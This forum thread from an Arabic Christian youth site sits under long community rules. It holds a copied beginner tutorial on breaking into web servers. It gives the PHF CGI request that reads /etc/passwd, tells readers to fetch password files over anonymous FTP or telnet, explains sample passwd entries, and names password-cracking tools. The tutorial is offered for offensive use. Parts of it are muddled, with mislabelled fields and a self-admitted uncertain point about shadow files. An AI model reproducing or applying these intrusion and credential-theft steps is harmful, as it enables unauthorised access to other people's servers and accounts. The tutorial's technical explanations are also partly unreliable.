• If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below.

Announcement

Collapse

قوانين المنتدى " التعديل الاخير 17/03/2018 "

فيكم تضلو على تواصل معنا عن طريق اللينك: www.ch-g.org

قواعد المنتدى:
التسجيل في هذا المنتدى مجاني , نحن نصر على إلتزامك بالقواعد والسياسات المفصلة أدناه.
إن مشرفي وإداريي منتدى الشباب المسيحي - سوريا بالرغم من محاولتهم منع جميع المشاركات المخالفة ، فإنه ليس بوسعهم استعراض جميع المشاركات.
وجميع المواضيع تعبر عن وجهة نظر كاتبها ولا يتحمل أي من إدارة منتدى الشباب المسيحي - سوريا أي مسؤولية عن مضامين المشاركات.
عند التسجيل بالمنتدى فإنك بحكم الموافق على عدم نشر أي مشاركة تخالف قوانين المنتدى فإن هذه القوانين وضعت لراحتكم ولصالح المنتدى، فمالكي منتدى الشباب المسيحي - سوريا لديهم حق حذف ، أو مسح ، أو تعديل ، أو إغلاق أي موضوع لأي سبب يرونه، وليسوا ملزمين بإعلانه على العام فلا يحق لك الملاحقة القانونية أو المسائلة القضائية.


المواضيع:
- تجنب استخدام حجم خط كبير (أكبر من 4) او صغير (أصغر من 2) او اختيار نوع خط رديء (سيء للقراءة).
- يمنع وضع عدد كبير من المواضيع بنفس القسم بفترة زمنية قصيرة.
- التأكد من ان الموضوع غير موجود مسبقا قبل اعتماده بالقسم و هالشي عن طريق محرك بحث المنتدى او عن طريق محرك بحث Google الخاص بالمنتدى والموجود بأسفل كل صفحة و التأكد من القسم المناسب للموضوع.
- إحترم قوانين الملكية الفكرية للأعضاء والمواقع و ذكر المصدر بنهاية الموضوع.
- مو المهم وضع 100 موضوع باليوم و انما المهم اعتماد مواضيع ذات قيمة و تجذب بقية الاعضاء و الابتعاد عن مواضيع العاب العد متل "اللي بيوصل للرقم 10 بياخد بوسة" لأنو مخالفة و رح تنحزف.
- ممنوع وضع الاعلانات التجارية من دون موافقة الادارة "خارج قسم الاعلانات".
- ممنوع وضع روابط دعائية لمواقع تانية كمان من دون موافقة الادارة "خارج قسم الاعلانات".
- لما بتشوفو موضوع بغير قسمو او فيو شي مو منيح او شي مو طبيعي , لا تردو عالموضوع او تحاورو صاحب الموضوع او تقتبسو شي من الموضوع لأنو رح يتعدل او ينحزف و انما كبسو على "التقرير بمشاركة سيئة" و نحن منتصرف.
- لما بتشوفو موضوع بقسم الشكاوي و الاقتراحات لا تردو على الموضوع الا اذا كنتو واثقين من انكم بتعرفو الحل "اذا كان الموضوع عبارة عن استفسار" , اما اذا كان الموضوع "شكوى" مافي داعي تردو لأنو ممكن تعبرو عن وجهة نظركم اللي ممكن تكون مختلفة عن توجه المنتدى مشان هيك نحن منرد.
- ممنوع وضع برامج الاختراق او المساعدة بعمليات السرقة وبشكل عام الـ "Hacking Programs".
- ممنوع طرح مواضيع او مشاركات مخالفة للكتاب المقدس " الانجيل " وبمعنى تاني مخالفة للايمان المسيحي.
- ممنوع طرح مواضيع او مشاركات تمس الطوائف المسيحية بأي شكل من الاشكال "مدح او ذم" والابتعاد بشكل كامل عن فتح اي نقاش يحمل صبغة طائفية.
- ضمن منتدى " تعرفون الحق و الحق يحرركم " بالامكان طرح الاسئلة بصيغة السؤال والجواب فقط ويمنع فتح باب النقاش والحوار بما يؤدي لمهاترات وافتراض اجوبة مسبقة.


عناوين المواضيع:
- عنوان الموضوع لازم يعبر عن محتوى الموضوع و يفي بالمحتوى و ما لازم يكون متل هيك "الكل يفوت , تعوا بسرعة , جديد جديد , صور حلوة , الخ ....".
- لازم العنوان يكون مكتوب بطريقة واضحة بدون اي اضافات او حركات متل "(((((((((العنوان)))))))))))) , $$$$$$$$$ العنوان $$$$$$$$$".
- عنوان الموضوع ما لازم يحتوي على اي مدات متل "الــعــنـــوان" و انما لازم يكون هيك "العنوان".


المشاركات:
- ممنوع تغيير مسار الموضوع لما بكون موضوع جدي من نقاش او حوار.
- ممنوع فتح احاديث جانبية ضمن المواضيع وانما هالشي بتم عالبرايفت او بالدردشة.
- ممنوع استخدام الفاظ سوقية من سب او شتم او تجريح او اي الفاظ خارجة عن الزوق العام.
- ممنوع المساس بالرموز و الشخصيات الدينية او السياسية او العقائدية.
- استخدام زر "thanks" باسفل الموضوع اذا كنتو بدكم تكتبو بالمشاركة كلمة شكر فقط.
- لما بتشوفو مشاركة سيئة او مكررة او مو بمحلها او فيا شي مو منيح , لا تردو عليها او تحاورو صاحب المشاركة او تقتبسو من المشاركة لأنو رح تنحزف او تتعدل , وانما كبسو على "التقرير بمشاركة سيئة" و نحن منتصرف.


العضوية:
- ممنوع استخدام اكتر من عضوية "ممنوع التسجيل بأكتر من اسم".
- ممنوع اضافة حركات او رموز لاسم العضوية متل " # , $ , () " و انما يجب استخدام حروف اللغة الانكليزية فقط.
- ممنوع اضافة المدات لاسم العضوية "الـعـضـويـة" و انما لازم تكون بهل شكل "العضوية".
- ممنوع استخدام اسماء عضويات تحتوي على الفاظ سوقية او الفاظ بزيئة.
- ممنوع وضع صورة رمزية او صورة ملف شخصي او صور الالبوم خادشة للحياء او الزوق العام.
- التواقيع لازم تكون باللغة العربية او الانكليزية حصرا و يمنع وضع اي عبارة بلغة اخرى.
- ما لازم يحتوي التوقيع على خطوط كتيرة او فواصل او المبالغة بحجم خط التوقيع و السمايليات او المبالغة بمقدار الانتقال الشاقولي في التوقيع "يعني عدم ترك سطور فاضية بالتوقيع و عدم تجاوز 5 سطور بحجم خط 3".
- ما لازم يحتوي التوقيع على لينكات "روابط " دعائية , او لمواقع تانية او لينك لصورة او موضوع بمنتدى اخر او ايميل او اي نوع من اللينكات , ما عدا لينكات مواضيع المنتدى.
- تعبئة كامل حقول الملف الشخصي و هالشي بساعد بقية الاعضاء على معرفة بعض اكتر و التقرب من بعض اكتر "ما لم يكن هناك سبب وجيه لمنع ذلك".
- فيكم تطلبو تغيير اسم العضوية لمرة واحدة فقط وبعد ستة اشهر على تسجيلكم بالمنتدى , او يكون صار عندكم 1000 مشاركة , ومن شروط تغيير الاسم انو ما يكون مخالف لشروط التسجيل "قوانين المنتدى" و انو الاسم الجديد ما يكون مأخود من قبل عضو تاني , و انو تحطو بتوقيعكم لمدة اسبوع على الاقل "فلان سابقا".
- يمنع انتحال شخصيات الآخرين أو مناصبهم من خلال الأسماء أو الصور الرمزية أو الصور الشخصية أو ضمن محتوى التوقيع أو عن طريق الرسائل الخاصة فهذا يعتبر وسيلة من وسائل الإحتيال.


الرسائل الخاصة:
الرسائل الخاصة مراقبة مع احترام خصوصيتا وذلك بعدم نشرها على العام في حال وصلكم رسالة خاصة سيئة فيكم تكبسو على زر "تقرير برسالة خاصة" ولا يتم طرح الشكوى عالعام "متل انو توصلكم رسالة خاصة تحتوي على روابط دعائية لمنتجات او مواقع او منتديات او بتحتوي على الفاظ نابية من سب او شتم او تجريح".
لما بتوصلكم رسائل خاصة مزعجة و انما ما فيها لا سب ولا شتم ولا تجريح ولا روابط دعائية و انما عم يدايقكم شي عضو من كترة رسائلو الخاصة فيكم تحطو العضو على قائمة التجاهل و هيك ما بتوصل اي رسالة خاصة من هالعضو.
و تزكرو انو الهدف من الرسائل الخاصة هو تسهيل عملية التواصل بين الاعضاء.


السياسة:
عدم التطرق إلى سياسة الدولة الخارجية أو الداخلية أو حتى المساس بسياسات الدول الصديقة فالموقع لا يمت للسياسة بصلة ويرجى التفرقة بين سياسات الدول وسياسات الأفراد والمجتمعات وعدم التجريح أو المساس بها فالمنتدى ليس حكر على فئة معينة بل يستقبل فئات عدة.
عدم اعتماد مواضيع أو مشاركات تهدف لزعزعة سياسة الجمهورية العربية السورية أو تحاول أن تضعف الشعور القومي أو تنتقص من هيبة الدولة ومكانتها أو أن يساهم بشكل مباشر أو غير مباشر بزعزعة الأمن والاستقرار في الجمهورية العربية السورية فيحق للادارة حذف الموضوع مع ايقاف عضوية صاحب الموضوع.


المخالفات:
بسبب تنوع المخالفات و عدم امكانية حصر هالمخالفات بجدول محدد , منتبع اسلوب مخالفات بما يراه المشرف مناسب من عدد نقط و مدة المخالفة بيتراوح عدد النقط بين 1-100 نقطة , لما توصلو لل 100 بتم الحظر الاوتوماتيكي للعضو ممكن تاخدو تنبيه بـ 5 نقط مثلا على شي مخالفة , و ممكن تاخد 25 نقطة على نفس المخالفة و ممكن يوصلو لل 50 نقطة كمان و هالشي بيرجع لعدد تكرارك للمخالفة او غير مخالفة خلال فترة زمنية قصيرة.
عند تلقيك مخالفة بيظهر تحت عدد المشاركات خانة جديدة " المخالفات :" و بيوصلك رسالة خاصة عن سبب المخالفة و عدد النقط و المدة طبعا هالشي بيظهر عندكم فقط.


الهدف:
- أسرة شبابية سورية وعربية مسيحية ملؤها المحبة.
- توعية وتثقيف الشباب المسيحي.
- مناقشة مشاكل وهموم وأفكار شبابنا السوري العربي المسيحي.
- نشر التعاليم المسيحية الصحيحة وعدم الإنحياز بشكل مذهبي نحو طائفة معينة بغية النقد السيء فقط.
في بعض الأحيان كان من الممكن أن ينحني عن مسار أهدافه ليكون مشابه لغيره من المنتديات فكان العمل على عدم جعله منتدى ديني متخصص كحوار بين الطوائف , فنتيجة التجربة وعلى عدة مواقع تبين وبالشكل الأكبر عدم المنفعة المرجوة بهذا الفكر والمنحى , نعم قد نشير ونوضح لكن بغية ورغبة الفائدة لنا جميعا وبتعاون الجميع وليس بغية بدء محاورات كانت تنتهي دوما بالتجريح ومن الطرفين فضبط النفس صعب بهذه المواقف.



رح نكتب شوية ملاحظات عامة يا ريت الكل يتقيد فيها:
• ابحث عن المنتدى المناسب لك و تصفح أقسامه ومواضيعه جيداً واستوعب مضمونه وهدفه قبل ان تبادر بالمشاركة به , فهناك الكثير من المنتديات غير اللائقة على الإنترنت .وهناك منتديات متخصصة بمجالات معينة قد لا تناسبك وهناك منتديات خاصة بأناس محددين.
• إقرأ شروط التسجيل والمشاركة في المنتدى قبل التسجيل به واستوعبها جيدأ واحترمها و اتبعها حتى لا تخل بها فتقع في مشاكل مع الأعضاء ومشرفي المنتديات.
• اختر اسم مستعار يليق بك وبصفاتك الشخصية ويحمل معاني إيجابية ، وابتعد عن الأسماء السيئة والمفردات البذيئة ، فأنت في المنتدى تمثل نفسك وأخلاقك وثقافتك وبلدك ، كما أن الاسم المستعار يعطي صفاته ودلالته لصاحبه مع الوقت حيث يتأثر الإنسان به بشكل غير مباشر ودون ان يدرك ذلك.
• استخدم رمز لشخصيتك " وهو الصورة المستخدمة تحت الاسم المستعار في المنتدى " يليق بك و يعبر عن شخصيتك واحرص على ان يكون أبعاده مناسبة.
• عند اختيارك لتوقيعك احرص على اختصاره ، وأن يكون مضمونه مناسباً لشخصيتك وثقافتك.
• استخدم اللغة العربية الفصحى وابتعد عن اللهجات المحكية " اللهجة السورية مستثناة لكثرة المسلسلات السورية " لانها قد تكون مفهومة لبعض الجنسيات وغير مفهومة لجنسيات أخرى كما قد تكون لكلمة في لهجتك المحكية معنى عادي ولها معنى منافي للأخلاق أو مسيء لجنسية أخرى . كذلك فإن استخدامك للغة العربية الفصحى يسمح لزوار المنتدى وأعضائه بالعثور على المعلومات باستخدام ميزة البحث.
• استخدم المصحح اللغوي وراعي قواعد اللغة عند كتابتك في المنتديات حتى تظهر بالمظهر اللائق التي تتمناه.
• أعطي انطباع جيد عن نفسك .. فكن مهذباً لبقاً واختر كلماتك بحكمة.
• لا تكتب في المنتديات أي معلومات شخصية عنك أو عن أسرتك ، فالمنتديات مفتوحة وقد يطلع عليها الغرباء.
• أظهر مشاعرك وعواطفك باستخدام ايقونات التعبير عن المشاعر Emotion Icon's عند كتابة مواضيعك وردودك يجب ان توضح مشاعرك أثناء كتابتها ، هل سيرسلها مرحة بقصد الضحك ؟ او جادة أو حزينه ؟ فعليك توضيح مشاعرك باستخدام Emotion Icon's ،لأنك عندما تتكلم في الواقع مع احد وجها لوجه فانه يرى تعابير وجهك وحركة جسمك ويسمع نبرة صوتك فيعرف ما تقصد ان كنت تتحدث معه على سبيل المزاح أم الجد. لكن لا تفرط في استخدام أيقونات المشاعر و الخطوط الملونة و المتغيرة الحجم ، فما زاد عن حده نقص.
• إن ما تكتبه في المنتديات يبقى ما بقي الموقع على الإنترنت ، فاحرص على كل كلمة تكتبها ، فمن الممكن ان يراها معارفك وأصدقائك وأساتذتك حتى وبعد مرور فترات زمنية طويلة.
• حاول اختصار رسالتك قدر الإمكان :بحيث تكون قصيرة و مختصرة ومباشرة وواضحة وفي صلب مضمون قسم المنتدى.
• كن عالمياً : واعلم أن هناك مستخدمين للإنترنت يستخدمون برامج تصفح مختلفة وكذلك برامج بريد الكتروني متعددة ، لذا عليك ألا تستخدم خطوط غريبة بل استخدم الخطوط المعتاد استخدامها ، لأنه قد لا يتمكن القراء من قراءتها فتظهر لهم برموز وحروف غريبة.
• قم بتقديم ردود الشكر والتقدير لكل من أضاف رداً على موضوعك وأجب على أسئلتهم وتجاوب معهم بسعة صدر وترحيب.
• استخدم ميزة البحث في المنتديات لمحاولة الحصول على الإجابة قبل السؤال عن أمر معين أو طلب المساعدة من بقية الأعضاء حتى لا تكرر الأسئلة والاستفسارات والاقتراحات التى تم الإجابة عنها قبل ذلك.
• تأكد من أنك تطرح الموضوع في المنتدى المخصص له: حيث تقسم المنتديات عادة إلى عدة منتديات تشمل جميع الموضوعات التي يمكن طرحها ومناقشتها هنا، وهذا من شأنه أن يرفع من كفاءة المنتديات ويسهل عملية تصنيف وتبويب الموضوعات، ويفضل قراءة الوصف العام لكل منتدى تحت اسمه في فهرس المنتديات للتأكد من أن مشاركتك تأخذ مكانها الصحيح.
• استخدم عنوان مناسب ومميِّز لمشاركتك في حقل الموضوع. يفضل عدم استخدام عبارات عامة مثل "يرجى المساعدة" أو "طلب عاجل" أو "أنا في ورطة" الخ، ويكون ذلك بكتابة عناوين مميِّزة للموضوعات مثل "كيف استخدم أمر كذا في برنامج كذا" أو "تصدير ملفات كذا إلى كذا".
• إحترم قوانين الملكية الفكرية للأعضاء والمواقع والشركات، وعليك أن تذكر في نهاية مشاركتك عبارة "منقول عن..." إذا قمت بنقل خبر أو مشاركة معينة من أحد المواقع أو المجلات أو المنتديات المنتشرة على الإنترنت.
• إن أغلب المنتديات تكون موجهه لجمهور عام ولمناقشة قضايا تثقيفية وتعليمية . لذلك يجب ان تكون مشاركتك بطريقة تحترم مشاعر الآخرين وعدم الهجوم في النقاشات والحوارات. وأي نشر لصور أو نصوص أو وصلات مسيئة، خادشة للحياء أو خارج سياق النهج العام للموقع.
• المنتدى لم يوجد من أجل نشر الإعلانات لذا يجب عدم نشر الإعلانات أو الوصلات التي تشير إلى مواقع إعلانية لأي منتج دون إذن او إشارة إلى موقعك أو مدونتك إذا كنت تمتلك ذلك.
• عدم نشر أي مواد أو وصلات لبرامج تعرض أمن الموقع أو أمن أجهزة الأعضاء الآخرين لخطر الفيروسات أو الدودات أو أحصنة طروادة.
•ليس المهم أن تشارك بألف موضوع فى المنتدى لكن المهم أن تشارك بموضوع يقرأه الألوف،فالعبرة بالنوع وليس بالكم.
• عدم الإساءة إلى الأديان أو للشخصيات الدينية.
•عند رغبتك بإضافة صور لموضوعك في المنتدى ، احرص على ألا يكون حجمها كبير حتى لا تستغرق وقتاً طويلاً لتحميلها وأن تكون في سياق الموضوع لا خارجه عنه.
•الالتزام بالموضوع في الردود بحيث يكون النقاش في حدود الموضوع المطروح لا الشخص، وعدم التفرع لغيره أو الخروج عنه أو الدخول في موضوعات أخرى حتى لا يخرج النقاش عن طوره.
• البعد عن الجدال العقيم والحوار الغير مجدي والإساءة إلى أي من المشاركين ، والردود التي تخل بأصول اللياقة والاحترام.
• احترم الرأي الآخر وقدر الخلاف في الرأي بين البشر واتبع آداب الخلاف وتقبله، وأن الخلاف في الرأي لا يفسد للود قضية.
• التروي وعدم الاستعجال في الردود ، وعدم إلقاء الأقوال على عواهلها ودون تثبت، وأن تكون التعليقات بعد تفكير وتأمل في مضمون المداخله، فضلاً عن التراجع عن الخطأ؛ فالرجوع إلى الحق فضيلة. علاوة على حسن الاستماع لأقوال الطرف الآخر ، وتفهمها تفهما صحيحا.
• إياك و تجريح الجماعات أو الأفراد أو الهيئات أو الطعن فيهم شخصياً أو مهنياً أو أخلاقياً، أو استخدام أي وسيلة من وسائل التخويف أو التهديد او الردع ضد أي شخص بأي شكل من الأشكال.
• يمنع انتحال شخصيات الآخرين أو مناصبهم من خلال الأسماء أو الصور الرمزية أو الصور الشخصية أو ضمن محتوى التوقيع أو عن طريق الرسائل الخاصة فهذا يعتبر وسيلة من وسائل الإحتيال.
• إذا لاحظت وجود خلل في صفحة أو رابط ما أو إساءة من أحد الأعضاء فيجب إخطار مدير الموقع أو المشرف المختص على الفور لأخذ التدابير اللازمة وذلك بإرسال رسالة خاصة له.
• فريق الإشراف يعمل على مراقبة المواضيع وتطوير الموقع بشكل يومي، لذا يجب على المشاركين عدم التصرف "كمشرفين" في حال ملاحظتهم لخلل أو إساءة في الموقع وتنبيه أحد أعضاء فريق الإشراف فوراً.
See more
See less

إختراق المواقع

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • إختراق المواقع

    إختراق المواقع شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي أن تتعرف على نظام التشغيل لسيرفر
    وهي مسأله في غايه البساطه والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد
    إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن
    النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه
    لن أتحدث عنها لأني لا أعرفها ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
    لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
    مثلا نريد اختراق الموقع
    www.aaaaaa.com على سبيل المثال
    وهذا موقع ليس مجاني بل هو نطاق له سيرفره ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
    نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو
    hgguutujfkerh@aaaaaa.com
    وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
    ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
    ////////////
    ////////////
    ملاحظه مهمه
    ////////////
    ////////////
    قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات
    /////////////////////////////////////////////////
    لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
    مثلا أدخل على السيرفر في وضع التخفي
    anonymously (( إستخدم التلنت في هذه الخطوه ))
    وانظر الى المجلد المسمى بـ
    etc
    وأطلب الملف
    passwd
    هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره
    طريقه أخرى لإختراق هذا النوع من السيرفرات
    أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
    عند توفره أطلب الملف التالي
    cgi-bin/phf?Qalias=x
    /bin/cat /etc/passwd
    مثلا عنوان الموقع هو
    www.aaaaaa.com
    نكتب هكذا
    www.aaaaaa.com/cgi-bin/phf?Qalias=x
    /bin/cat /etc/passwd
    عندها سوف يرسل لك الملف
    passwd
    وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف هناك أمر حيرني كثيرا وجاب لي الصداع وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !
    الآن سوف أضع أسئله وأجوبه لتسهل الفهم
    س: ما الملف
    passwd
    وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
    ج: الملف
    passwd
    يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا

    Sources Code - شفرة

    root:x:0:1:0000-Admin(0000):/:/bin/ksh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:
    listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
    nobody:/:noaccess:x:60002:60002:uid noaccess:/:
    ftp:x:101:4:
    FTPUser:/export/home/ftp:
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor


    إحنا علينا من السطر هذا
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
    ولتفسيره نقول بأن
    إسم المستخدم هو
    aaaaaa
    وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
    yu&rte6745kd
    وايضا
    User number: 201
    Group Number: 4
    Real Name (usually): Richard Clark
    Home Directory: /export/home/rrc
    Type of ****l: /bin/ksh
    الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
    حاولت أن تعرف من هذه شئ
    admin sign in:/:/bin/csh
    sysadm:ufcNtKNYj7m9I:0:0:
    Regular Admin login:/admin:/sbin/sh
    bin:*:2:2:Admin :/bin:
    sys:*:3:3:Admin :/usr/src:
    adm:*:4:4:Admin :/usr/adm:/sbin/sh
    daemon:*:1:1: Daemon Login for daemons needing
    nobody:*:65534:65534::/:
    ftp:*:39:39:FTP guest login:/var/ftp:
    dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
    joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
    س : هل اي ثغره تنجح ؟
    ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
    مثلا الموقع alsahat.net يعمل على نظام لينكس
    وقد يكون لثغره أن سبق ورقعت
    س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
    ج : هذا شئ أكيد ...
    س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
    ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
    )(
    إعذروني لن كان كلامي مو مرتب
    )(


    شكل الكلام والله مو مرتب ... عشان كذا بعيد أكتب لكم بتعمق أكثر والكلام اللي فوق هذا مجرد مقدمه
    بكتب بالعاميه ازين لي ولكم
    مو لازم تعرف الكلام الي سبق ذكرته لكن إفهم منه جواب السؤال :: كيف يتم :: فقط
    === نبداء من هنا وبعمق ===
    عرفنا ان الملف
    (سوف نسميه من الآن بإسم ملف الباسورد )passwd file
    يحتوي على إسماء المستخدمين المرخص لهم الدخول الى السيرفر وكلماتهم السريه وعرفنا أيضا أنها مشفره ولكن ضع كل تفكيره في الحصول على ملف الباسورد وأترك كيفت كسر التشفير في النهايه فهي تعتبر بسيطه
    فمتو كل اللي راح ,,,, تمام
    إستغلال الثغرات
    اولا ما هي الثغرات ,,, الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على ماعلمومات أو نشر فيروسات من خلال هذه الثغره
    من ضمن هذه الثغرات ، ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
    www.aaaaaa.com
    ونورد عنها الآن تفاصيل
    تسمى هذه الثغره الأمنيه بـ
    PHF
    ومعظم السيرفرات تمتلك هذه الثغره والى الآن لم يتم رقعها مع الأسف (إذا وجد عنده سي جي آي فقط ) !:! إذا نجحت هذه الثغره فسوف يعرض لك ملف الباسورد ، زي هذا مثلا
    Sources Code - شفرة

    root:x:0:1:0000-Admin(0000):/:/bin/ksh
    daemon:x:1:1:0000-Admin(0000):/:
    bin:x:2:2:0000-Admin(0000):/usr/bin:
    listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
    nobody:/:noaccess:x:60002:60002:uid noaccess:/:
    ftp:x:101:4:
    FTPUser:/export/home/ftp:
    kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor


    كما ذكرنا سابقن (كتابه سابقاً هكذا سابقن أفضل ) لووول
    أحفظ الملف في تكست او مستند نص عشان تسوي له عمليات لكسر التشفير
    FTP Passwd
    بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
    anonymous logins
    والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد ، غستخدم احد هذه البرامج لهمل ذلك
    WS FTP or CuteFTP
    وبعد ماتدخل بالوضع الخفي راح تجيك لسته أو قائمه
    إختر منها
    etc
    وراح يعرض لك عدد قليل من الملفات مثل هذا
    "group, passwd"
    وملف الباسورد مو شرط يكون إسمه
    passwd
    ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
    "root, daemon, FTP, nobody, ftplogin, bin"
    وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
    "joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
    والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن
    س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
    جاوب أنت .... !:!
    التعقب لملف الباسورد
    الآن وبعد أن حصلت على مثل هذا
    "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
    فأنت الآن تملك
    shadowed passwd
    فهذا يتدلى في نظام التشفيل ولكن الـ
    passwd file
    يختلف (لا داعي لتعمق اكثر ) والملف
    passwd file
    هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو x
    و الـ
    shadow file
    يكون مكان كلمة السر نجمه أو رمز
    وأنا الى الآن لست متأكد من هذه النقطه


    (منقول)

  • #2
    رد: إختراق المواقع

    يا شباب موقع www.aaaaaa.com هو موقع مو موجود بس مشان تتوضح الفكرة

    Comment

    Working...
    X